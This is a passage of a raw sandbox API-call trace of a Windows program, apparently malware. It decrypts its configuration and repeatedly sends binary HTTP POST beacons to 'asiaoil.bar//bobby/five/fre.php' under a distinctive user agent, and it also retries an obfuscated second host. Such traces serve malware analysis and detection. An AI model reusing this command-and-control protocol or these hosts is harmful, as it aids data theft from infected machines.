pbData=0x7636f8, pdwDataLen=0x19fcfc | out: pbData=0x7636f8, pdwDataLen=0x19fcfc) returned 1 [0310.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.169] CryptDestroyKey (hKey=0x74d768) returned 1 [0310.171] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.171] CryptReleaseContext (hProv=0x75d430, dwFlags=0x0) returned 1 [0310.172] GetProcessHeap () returned 0x740000 [0310.172] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0310.172] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.173] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0310.174] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.174] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0310.175] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.176] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0310.176] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.203] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0310.203] GetProcessHeap () returned 0x740000 [0310.203] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdf0 [0310.203] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c250*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0310.205] GetProcessHeap () returned 0x740000 [0310.205] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b670 [0310.205] socket (af=2, type=1, protocol=6) returned 0x2ec [0310.205] connect (s=0x2ec, name=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0310.225] FreeAddrInfoW (pAddrInfo=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c250*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0310.225] GetProcessHeap () returned 0x740000 [0310.225] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d8f8 [0310.225] GetProcessHeap () returned 0x740000 [0310.225] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0310.226] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0310.227] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0310.227] GetProcessHeap () returned 0x740000 [0310.227] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0310.227] GetProcessHeap () returned 0x740000 [0310.227] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0310.227] GetProcessHeap () returned 0x740000 [0310.227] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763d70 [0310.227] GetProcessHeap () returned 0x740000 [0310.228] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0310.228] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0310.230] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0310.230] GetProcessHeap () returned 0x740000 [0310.230] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0310.230] GetProcessHeap () returned 0x740000 [0310.230] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0310.230] send (s=0x2ec, buf=0x747928*, len=243, flags=0) returned 243 [0310.232] send (s=0x2ec, buf=0x761fd0*, len=159, flags=0) returned 159 [0310.232] GetProcessHeap () returned 0x740000 [0310.232] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0310.232] recv (in: s=0x2ec, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 573 [0310.364] GetProcessHeap () returned 0x740000 [0310.364] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0310.364] GetProcessHeap () returned 0x740000 [0310.365] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763d70 | out: hHeap=0x740000) returned 1 [0310.365] GetProcessHeap () returned 0x740000 [0310.366] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0310.366] GetProcessHeap () returned 0x740000 [0310.366] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d8f8 | out: hHeap=0x740000) returned 1 [0310.366] closesocket (s=0x2ec) returned 0 [0310.366] GetProcessHeap () returned 0x740000 [0310.366] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b670 | out: hHeap=0x740000) returned 1 [0310.366] GetProcessHeap () returned 0x740000 [0310.367] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0310.367] GetProcessHeap () returned 0x740000 [0310.367] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7636f8 | out: hHeap=0x740000) returned 1 [0310.367] GetProcessHeap () returned 0x740000 [0310.367] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0310.368] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd24) returned 0x2ec [0310.371] Sleep (dwMilliseconds=0xea60) [0310.373] GetProcessHeap () returned 0x740000 [0310.373] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763938 [0310.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.374] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.382] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d298) returned 1 [0310.394] GetProcessHeap () returned 0x740000 [0310.394] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0310.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.456] CryptImportKey (in: hProv=0x75d298, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0310.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.457] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.458] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.458] GetProcessHeap () returned 0x740000 [0310.458] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0310.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.459] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763938, pdwDataLen=0x19fcfc | out: pbData=0x763938, pdwDataLen=0x19fcfc) returned 1 [0310.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.460] CryptDestroyKey (hKey=0x74d768) returned 1 [0310.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.461] CryptReleaseContext (hProv=0x75d298, dwFlags=0x0) returned 1 [0310.461] GetProcessHeap () returned 0x740000 [0310.461] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0310.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.462] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0310.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.463] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0310.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.464] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0310.465] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.465] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0310.465] GetProcessHeap () returned 0x740000 [0310.465] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75be40 [0310.465] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0310.466] GetProcessHeap () returned 0x740000 [0310.466] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be40 | out: hHeap=0x740000) returned 1 [0310.466] GetProcessHeap () returned 0x740000 [0310.466] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0310.466] GetProcessHeap () returned 0x740000 [0310.466] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763938 | out: hHeap=0x740000) returned 1 [0310.467] GetProcessHeap () returned 0x740000 [0310.467] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7638a8 [0310.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.467] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.474] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cf68) returned 1 [0310.481] GetProcessHeap () returned 0x740000 [0310.482] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0310.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.483] CryptImportKey (in: hProv=0x75cf68, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0310.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.483] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.484] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.484] GetProcessHeap () returned 0x740000 [0310.485] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0310.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.486] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7638a8, pdwDataLen=0x19fcfc | out: pbData=0x7638a8, pdwDataLen=0x19fcfc) returned 1 [0310.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.487] CryptDestroyKey (hKey=0x74d768) returned 1 [0310.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.489] CryptReleaseContext (hProv=0x75cf68, dwFlags=0x0) returned 1 [0310.489] GetProcessHeap () returned 0x740000 [0310.489] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0310.490] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.490] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0310.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.491] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0310.492] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.492] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0310.492] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.493] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0310.493] GetProcessHeap () returned 0x740000 [0310.493] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c110 [0310.493] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0310.537] GetProcessHeap () returned 0x740000 [0310.537] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b530 [0310.537] socket (af=2, type=1, protocol=6) returned 0x2f0 [0310.537] connect (s=0x2f0, name=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0310.554] FreeAddrInfoW (pAddrInfo=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0310.554] GetProcessHeap () returned 0x740000 [0310.554] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d210 [0310.554] GetProcessHeap () returned 0x740000 [0310.554] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0310.555] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0310.555] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0310.555] GetProcessHeap () returned 0x740000 [0310.555] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0310.555] GetProcessHeap () returned 0x740000 [0310.556] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0310.556] GetProcessHeap () returned 0x740000 [0310.556] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763d28 [0310.556] GetProcessHeap () returned 0x740000 [0310.557] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0310.557] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0310.558] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0310.558] GetProcessHeap () returned 0x740000 [0310.558] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0310.558] GetProcessHeap () returned 0x740000 [0310.558] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0310.558] send (s=0x2f0, buf=0x747928*, len=243, flags=0) returned 243 [0310.559] send (s=0x2f0, buf=0x761fd0*, len=159, flags=0) returned 159 [0310.559] GetProcessHeap () returned 0x740000 [0310.559] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0310.559] recv (in: s=0x2f0, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 571 [0310.651] GetProcessHeap () returned 0x740000 [0310.652] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0310.652] GetProcessHeap () returned 0x740000 [0310.653] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763d28 | out: hHeap=0x740000) returned 1 [0310.653] GetProcessHeap () returned 0x740000 [0310.654] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0310.654] GetProcessHeap () returned 0x740000 [0310.654] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d210 | out: hHeap=0x740000) returned 1 [0310.654] closesocket (s=0x2f0) returned 0 [0310.655] GetProcessHeap () returned 0x740000 [0310.655] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b530 | out: hHeap=0x740000) returned 1 [0310.655] GetProcessHeap () returned 0x740000 [0310.655] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0310.655] GetProcessHeap () returned 0x740000 [0310.656] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7638a8 | out: hHeap=0x740000) returned 1 [0310.656] GetProcessHeap () returned 0x740000 [0310.656] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c110 | out: hHeap=0x740000) returned 1 [0310.656] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x4f8) returned 0x2f0 [0310.658] Sleep (dwMilliseconds=0xea60) [0310.659] GetProcessHeap () returned 0x740000 [0310.659] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763c98 [0310.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.661] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.723] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cc38) returned 1 [0310.735] GetProcessHeap () returned 0x740000 [0310.735] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x7584a8 [0310.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.737] CryptImportKey (in: hProv=0x75cc38, pbData=0x7584a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0310.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.784] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.785] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.785] GetProcessHeap () returned 0x740000 [0310.785] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7584a8 | out: hHeap=0x740000) returned 1 [0310.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.786] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763c98, pdwDataLen=0x19fcfc | out: pbData=0x763c98, pdwDataLen=0x19fcfc) returned 1 [0310.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.787] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0310.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.788] CryptReleaseContext (hProv=0x75cc38, dwFlags=0x0) returned 1 [0310.788] GetProcessHeap () returned 0x740000 [0310.788] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0310.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.789] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0310.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.790] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0310.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.792] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0310.793] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.793] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0310.793] GetProcessHeap () returned 0x740000 [0310.793] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf80 [0310.793] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0310.793] GetProcessHeap () returned 0x740000 [0310.794] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf80 | out: hHeap=0x740000) returned 1 [0310.794] GetProcessHeap () returned 0x740000 [0310.794] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0310.794] GetProcessHeap () returned 0x740000 [0310.794] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0310.794] GetProcessHeap () returned 0x740000 [0310.794] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763668 [0310.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.796] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.802] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75caa0) returned 1 [0310.810] GetProcessHeap () returned 0x740000 [0310.810] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0310.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.812] CryptImportKey (in: hProv=0x75caa0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0310.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.813] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.814] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.814] GetProcessHeap () returned 0x740000 [0310.815] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0310.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.816] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763668, pdwDataLen=0x19fcfc | out: pbData=0x763668, pdwDataLen=0x19fcfc) returned 1 [0310.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.817] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0310.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.818] CryptReleaseContext (hProv=0x75caa0, dwFlags=0x0) returned 1 [0310.818] GetProcessHeap () returned 0x740000 [0310.818] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0310.819] LoadLibraryW 